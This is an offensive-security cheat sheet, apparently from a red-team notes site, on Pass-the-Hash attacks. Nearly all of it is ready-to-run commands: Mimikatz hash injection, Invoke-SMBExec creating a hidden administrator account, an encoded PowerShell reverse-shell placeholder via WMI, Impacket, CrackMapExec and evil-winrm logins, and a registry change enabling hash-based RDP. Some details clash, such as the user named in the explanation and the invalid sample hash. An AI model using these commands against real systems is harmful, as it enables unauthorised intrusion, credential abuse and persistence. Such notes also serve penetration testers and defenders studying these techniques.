Pass-The-Hash(FOR LIN&WIN)

Pass The Hash

A Pass the Hash (PTH) attack involves an attacker using a password hash in place of the actual password for authentication. This method allows the attacker to bypass the need to decrypt the hash to retrieve the password. PTH attacks take advantage of the fact that the authentication protocol accepts the hash directly, as it remains unchanged for all sessions until the password is altered.

Windows PTH

Mimikatz

mimikatz.exe privilege::debug "sekurlsa::pth /user:rio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:{DOMAIN} /run:cmd.exe" exit

Explanation:

  • privilege::debug - equivalent of admin rights

  • /user:carni7 - user we want to impersonate

  • /rc4 or /NTLM - user's password hash. rc4 is algorithm

  • /domain - The domain to which the user being impersonated belongs. For a local user account, you can use the computer name, localhost, or simply a dot (.)

  • sekurlsa::pth - mimikatz popular module, which is used for extracting credentials from LSASS.

  • /run:cmd.exe - Instructions to mimikatz to run cmd after injecting hash

Invoke-TheHash

Besides mimikatz we could use Invoke-TheHash for PTH on Windows. This tool uses PowerShell functions for performing Pass the Hash attacks with WMI and SMB. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol.

Import-Module .\Invoke-TheHash.psd1

  • SMB

Invoke-SMBExec -Target 13.13.13.13 -Domain corp.local -Username rio -Hash 12379N1D2YV31U20931C031 -Command "net user mark Password123 /add && net localgroup administrators mark /add" -Verbose

  • WMI

Invoke-WMIExec -Target DC01 -Domain {DOMAIN} -Username rio -Hash 12379N1D2YV31U20931C031 -Command "powershell -e JUSTLETSIMAGINETHISISBASE64ENCODEDPOWERSHELLREVERSESHELLCODE=="

Linux PTH

Impacket

Impacket has a lot of useful tools, but for this situtation we need only PsExec. Besides that we could use also wmiexec, atexec, smbexec.

impacket-psexec administrator@13.13.13.13 -hashes :12379N1D2YV31U20931C031
impacket-wmiexec administrator@13.13.13.13 -hashes :12379N1D2YV31U20931C031

CrackMapExec

crackmapexec smb 13.13.13.13 -u Administrator -d . -H 12379N1D2YV31U20931C031 -x whoami

Evil-winrm

evil-winrm -i 13.13.13.13 -u Administrator -H 12379N1D2YV31U20931C031

RDP

By default, Windows has disabled Restricted Admin Mode, and we need to fix that by adding new registry key to DisableRestrictedAdmin

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

And then to use xfreerdp for Pass The Hash

xfreerdp /v:13.13.13.13 /u:rio /pth:12379N1D2YV31U20931C031
PreviousDockerNextDetection And Evasion (FOR RT LATER)

Last updated